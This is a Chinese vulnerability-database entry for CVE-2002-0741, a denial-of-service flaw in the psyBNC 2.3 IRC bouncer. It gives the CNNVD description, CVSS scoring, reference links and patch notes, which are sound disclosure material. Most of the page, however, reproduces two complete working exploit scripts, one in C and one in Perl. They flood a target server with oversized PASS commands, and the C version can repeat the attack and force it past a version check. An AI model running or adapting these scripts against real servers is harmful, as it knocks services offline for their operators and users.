CVE-2002-0741
CVSS5.0
发布时间 :2002-08-12 00:00:00
修订时间 :2008-09-05 16:28:49
NMCOE    

[原文]psyBNC 2.3 allows remote attackers to cause a denial of service (CPU consumption and resource exhaustion) by sending a PASS command with a long password argument and quickly killing the connection, which is not properly terminated by psyBNC.


[CNNVD]PsyBNC超长密码导致拒绝服务漏洞(CNNVD-200208-140)

        
        psyBNC是一款免费开放源代码的IRC反弹(bouncing)服务程序,可以运行在Unix和Linux操作系统下。
        PsyBNC对用户发送超长的密码字符串缺少正确处理,可导致服务程序拒绝服务。
        攻击者可以连接到PsyBNC服务程序,并发送超过9000字符的密码信息,然后断开连接,PsyBNC服务进程不会崩溃,但是进程会消耗大量资源,过多的类似攻击可以导致系统拒绝响应正常服务。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0741
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0741
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200208-140
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/4570
(VENDOR_ADVISORY)  BID  4570
http://www.iss.net/security_center/static/8912.php
(VENDOR_ADVISORY)  XF  psybnc-long-password-dos(8912)
http://online.securityfocus.com/archive/1/269131
(UNKNOWN)  BUGTRAQ  20020423 PsyBNC Remote Dos POC
http://archives.neohapsis.com/archives/bugtraq/2002-04/0322.html
(UNKNOWN)  BUGTRAQ  20020422 Re: psyBNC 2.3 DoS / Bug

- 漏洞信息

PsyBNC超长密码导致拒绝服务漏洞
中危 未知
2002-08-12 00:00:00 2005-05-02 00:00:00
远程  
        
        psyBNC是一款免费开放源代码的IRC反弹(bouncing)服务程序,可以运行在Unix和Linux操作系统下。
        PsyBNC对用户发送超长的密码字符串缺少正确处理,可导致服务程序拒绝服务。
        攻击者可以连接到PsyBNC服务程序,并发送超过9000字符的密码信息,然后断开连接,PsyBNC服务进程不会崩溃,但是进程会消耗大量资源,过多的类似攻击可以导致系统拒绝响应正常服务。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 暂时没有合适的临时解决方法。
        厂商补丁:
        psyBNC
        ------
        此漏洞已经在2002 4/23之后的版本中得到修补:
        psyBNC psyBNC 2.3:
        PsyBNC Upgrade psyBNC2.3.tar.gz
        
        http://www.psychoid.lam3rz.de/psyBNC2.3.tar.gz

- 漏洞信息 (383)

psyBNC <= 2.3 Denial of Service Exploit (EDBID:383)
multiple dos
2002-05-19 Verified
31337 Lunar Fault
N/A [点击下载]
/* 
* psyBNC <= 2.3 DoS
* Information System Advancement in Penetration (ISAP) Labs
* By Lunar Fault [ElectronicSouls]
* (C) May 19, 2002
*
* Legal Notice:
* In no way is ElectronicSouls, ISAP, or the author responsible for the
* actions or usage of this program. The author retains all copyrights to the
* contents within includeing this banner, except for the resolvenametoip() 
* function. This source is not to be used for illegal purposes. Please check 
* your local laws before testing this proof of concept. 
*
* Description: 
* Problem dealing with over sized passwords. Once the DoS has been sent the 
* victim's psybnc's pid slowly begins to eat up cpu usage. This also results 
* in the fact that psybnc holds the connection with a TIME_WAIT further denying 
* access to the bnc. If you try and exploit the server more times than it allows 
* connections in force mode. The result will be a Broken Pipe, in standard mode it 
* will tell you the server is not vuln.
* 
* es 11805 99.7 1.9 2672 1216 pts/1 R 06:28 19:17 ./psybnc 
*
* Tested on psyBNC2.3, psyBNC2.2.1, psyBNC2.1.1
* Succefully exploited on Linux x86, and OpenBSD 3.0 x86. 
* 
* Lunar Fault
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <getopt.h>
#include <unistd.h>
#include <string.h> 

#define SIZE 9000
#define PORT 31337 
#define USER "pr0ix"

int senddos(int port, int size, char *target, char *user);
int checkvuln(char *rxbuf); 
int testvuln(int port, char *target);
unsigned long resolvenametoip(char *name); 
void usage(char *prog);

int checked = 0;
int force;

int main(int argc, char *argv[])
{
  int c, i, z;
  int port, size, times;
  int u_t = 0, d_t = 0, n_t = 0, p_t = 0, s_t = 0, t_t;
  char target[1024], *user;
  
  printf("[+] ES psyBNC <= 2.3 DoS\n");
  printf("[+] Information System Advancement in Penetration (ISAP) Labs\n");
  printf("[+] By: Lunar Fault [ElectronicSouls]\n");
  
  if(argc < 2) { usage(argv[0]);} 
  
  while ((c = getopt (argc, argv, "d:n:p:s:u:hft"))!=EOF) {
    switch(c) {
    case 'h':
      usage(argv[0]);
      break;
    case 'f':
      force = 1;
      break;
    case 'd':
      strncpy(target, optarg, sizeof(target));
      d_t = 1;
      break;
    case 'n':
      times = atoi(optarg);
      n_t = 1;
      break;
    case 'p':
      port = atoi(optarg);
      p_t = 1;
      break;
    case 's':
      size = atoi(optarg);
      s_t = 1;
      break;
    case 't':
      t_t = 1;
      break;
    case 'u':
      user = (char *) malloc(strlen(optarg));
      memcpy(user, optarg, strlen(optarg));
      u_t = 1;
      break;
    }
  }
  
  if (d_t == 0) { usage(argv[0]); }
  
  if (n_t == 0) times = 3;
  
  if (p_t == 0) port = PORT;
  
  if (s_t == 0) size = SIZE;
  
  if (u_t == 0) { 
    user = (char *) malloc(strlen(USER));
    memcpy(user, USER, strlen(USER));
  }
  
  printf("[*] Victim: %s\n", target);
  printf("[*] Port: %d\n", port);
  printf("[*] User: %s\n", user);
  printf("[*] Size: %d\n", size);
  printf("[*] Times: %d\n", times);
  
  if (t_t == 1) {
    printf("[*] Testing for vulnerability\n");
    z = testvuln(port, target);
    printf("\n");
    if (z == -1) {
      printf("[!] Failed to test Vuln!\n");
      exit(1);
    }
    return 0;
  } 
  
  if (force == 1) 
    printf("[*] Forceing DoS\n"); 
  
  for (i = 0; i < times; i++) {
    z = senddos(port, size, target, user);
    if (z == -1) {
      printf("[!] Failed on sending DoS!\n");
      exit(1);
    }
  }
  
  printf("[*] DoS sent %d times\n\n", times);
  return 0;
}

int senddos(int port, int size, char *target, char *user)
{
  int i, s, z, len_inet;
  unsigned long ipaddr;
  char *dosbuf, tmpbuf[128], *passbuf, rxbuf[1024];
  
  struct sockaddr_in victim;
  
  if (!(ipaddr = resolvenametoip(target))) {
    printf("[!] Failed to resolve '%s'\n", target);
    exit(1);
  }
  
  victim.sin_family = AF_INET;
  victim.sin_port = htons(port);
  victim.sin_addr.s_addr = ipaddr;
  
  len_inet = sizeof(victim);
  
  s = socket(PF_INET, SOCK_STREAM, 0);
  if (s < 0) {
    printf("[!] Failed to open socket!\n");
    exit(1);
  }
  
  z = connect(s, (struct sockaddr *)&victim, len_inet);
  if (z < 0) {
    printf("[!] Connection refused!\n");
    exit(1);
  }
  
  z = read(s, rxbuf, sizeof(rxbuf));
  if (z == -1) {
    printf("[!] Failed on read!\n");
    exit(1);
  }
  
  z = checkvuln(rxbuf);
  if (z == -1) {
    printf("[!] Failed on vuln check!\n");
    exit(1);
  }
  
  snprintf(tmpbuf, sizeof(tmpbuf), "NICK %s\n\r", user);
  
  z = write(s, tmpbuf, strlen(tmpbuf));
  if (z == -1) {
    printf("[!] Failed on write!\n");
    exit(1);
  }
  
  z = read(s, rxbuf, sizeof(rxbuf));
  if (z == -1) {
    printf("[!] Failed on read!\n");
    exit(1);
  }
  
  passbuf = (char *) malloc(size);
  for (i = 0; i < size; i++) 
    *(char *) &passbuf[i] = "A";
  
  dosbuf = (char *) malloc(7 + strlen(passbuf));
  
  memcpy(dosbuf, "PASS ", 5);
  
  memcpy(dosbuf+5, passbuf, strlen(passbuf));
  
  memcpy(dosbuf+5+strlen(passbuf), "\n\r", 2);
  
  z = write(s, dosbuf, strlen(dosbuf));
  if (z == -1) {
    printf("[!] Failed on write!\n");
    exit(1);
  }
  
  close(s);
  
  free(dosbuf);
  free(passbuf);
  
  return 0;
}

int checkvuln(char *rxbuf)
{
  int vuln_t;
  char *bnc;
  
  sprintf(&rxbuf[strlen(rxbuf)-2], 0);
  
  if (force == 1) {return 0;}
  if (checked == 1) { return 0;}
  printf("[?] Server returned: %s\n", rxbuf);
  if (bnc = strstr(rxbuf, "psyBNC2.")) {
    if (strcasecmp(&bnc[9], ".") > 0) {
      vuln_t = 1;
    }
    if ((int)(bnc[8] - '0') <= 3) { 
      if ((int)(bnc[8] - '0') == 3 && vuln_t == 1) {
        printf("[!] Server is NOT VULN!\n");
        exit(1);
      }
      printf("[*] Server is VULN!!\n");
    } else {
      printf("[!] Server is NOT VULN!\n");
      exit(1);
    }
  } else { 
    printf("[!] Server is NOT VULN!\n");
    exit(1);
  }
  
  checked = 1;
  
  return 0;
}

int testvuln(int port, char *target)
{
  int s, z, len_inet;
  unsigned long ipaddr;
  char rxbuf[1024];
  
  struct sockaddr_in victim;
  
  if (!(ipaddr = resolvenametoip(target))) {
    printf("[!] Failed to resolve '%s'\n", target);
    exit(1);
  }
  
  victim.sin_family = AF_INET;
  victim.sin_port = htons(port);
  victim.sin_addr.s_addr = ipaddr;
  
  len_inet = sizeof(victim);
  
  s = socket(PF_INET, SOCK_STREAM, 0);
  if (s < 0) {
    printf("[!] Failed to open socket!\n");
    exit(1);
  }
  
  z = connect(s, (struct sockaddr *)&victim, len_inet);
  if (z < 0) {
    printf("[!] Connection refused!\n");
    exit(1);
  }
  
  z = read(s, rxbuf, sizeof(rxbuf));
  if (z == -1) {
    printf("[!] Failed on read!\n");
    exit(1); 
  }
  
  z = checkvuln(rxbuf);
  if (z == -1) {
    printf("[!] Failed on vuln check!\n");
    exit(1);
  }
  
  return 0;
}

unsigned long resolvenametoip(char *name)
{
  struct hostent *host;
  unsigned long addr;
  
  if ((addr = inet_addr(name)) == -1) {
    if (!(host = gethostbyname(name))) return 0;
    else addr = *((unsigned long*)host->h_addr);
  }
  
  return addr;
} 

void usage(char *prog) 
{
  printf("usage: %s [options]\n", prog);
  printf("\t-d <target> Server hosting psybnc [REQUIRED]\n");
  printf("\t-f force Skip vuln checking\n");
  printf("\t-h help Your looking at it\n");
  printf("\t-n <number> Number of times to attack Default: 3\n");
  printf("\t-p <port> Port to connect to Default: 31337\n");
  printf("\t-s <size> Size of password to send Default: 9000\n");
  printf("\t-t test Tests for vuln\n");
  printf("\t-u <user> User to login with Default: pr0ix\n\n");
  exit(1);
}		

- 漏洞信息 (21409)

PsyBNC 2.3 Oversized Passwords Denial Of Service Vulnerability (EDBID:21409)
unix dos
2002-04-22 Verified
0 DVDMAN
N/A [点击下载]
source: http://www.securityfocus.com/bid/4570/info

PsyBNC is a freely available, open source IRC bouncing server. It is available for the UNIX and Linux operating systems.

Under some circumstances, it is possible for a remote user to crash a vulnerable server. Upon connection to a vulnerable system, if a user sends a password of 9000 or more characters, and disconnects from the system, the server process does not die. Instead, the process continues to live and consume a large amount of resources.


#!/usr/bin/perl
#PsyBNC 2.3 Remote DDOS POC
#By DVDMAN (DVDMAN@L33TSECURITY.COM)
#WWW.L33TSECURITY.COM
#L33T SECURITY

use Getopt::Std;
use IO::Socket;
$|=1;


my %options;
getopt('Hhp',\%options);
$arg2 = shift(@ARGV);
$options{h} && usage();
if ($options{H})
{
do_psy();
}
if ($options{p})
{
do_psy();
}
else
{
usage();
}
sub usage()
{
    print("[L33TSECURITY]  PsyBNC 2.3 Remote DDOS\n");
    print(" (C) DVDMAN \n\n");
    print("Usage: $0 [options]\n");
    print("-H = hostname or ip REQUIRED\n");
    print("-p = port of PSYBNC server REQUIRED\n");
}
  
exit(1);

 

sub do_psy() {
my $test = $options{H};
my $test2 = $options{p};

    $remote = IO::Socket::INET->new(
                        Proto     => "tcp",
                                PeerAddr  => $test,
                                PeerPort  => $test2,
        );
    unless ($remote) {
           print"error cannot connect";
           return
        }
    $remote->autoflush(1);


print STDERR "PsyBNC REMOTE DDOS BY DVDMAN\n";
print STDERR " starting attack in 5 seconds...\n";
sleep(5);

my $user = "USER OWNED OWNED OWNED OWNED OWNED\r\n";
my $nick = "NICK OWNED\r\n";
my $pw = "PASS " . "A"x10000;

print $remote $user;
print $remote $nick;
print $remote $pw;
print STDERR "DONE\n"; 
die "BYE\n";
}





#By DVDMAN (DVDMAN@L33TSECURITY.COM)
#WWW.L33TSECURITY.COM
#L33T SECURITY
		

- 漏洞信息

5120
psyBNC PASS Command Handling Remote Overflow DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

- 时间线

2002-04-23 Unknow
2002-04-23 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站